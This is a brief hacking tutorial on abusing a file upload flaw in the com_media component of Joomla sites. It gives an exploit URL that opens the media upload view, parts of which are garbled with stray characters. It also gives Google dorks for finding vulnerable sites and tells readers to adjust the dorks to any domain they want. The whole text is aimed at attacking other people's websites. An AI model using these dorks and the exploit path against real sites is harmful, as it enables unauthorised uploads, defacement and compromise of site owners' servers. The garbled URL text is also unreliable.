
Exploiting File Upload Vulnerabilty in Joomla Websites

Well in other words we can also call  "Exploit Com_Media" . 

This is very easy to learn step by step to get a vulnerability of file uploading in Joomla site.
Just edit your dork in your desire domain or what you want then you will be able to get more result instead of these below dorks.

Exploit: /index.php?option=com_media&view=ima�ges&�tmpl=component&fieldid=e_name=jform_art�icletext&asset=com_content&author=&folde�r=

Dork 1: inurl:index.php?option=com_media& site:ra
Dork 2: inurl:index2.php?option=com_media& site:net 
Dork 3: inurl:option=com_media

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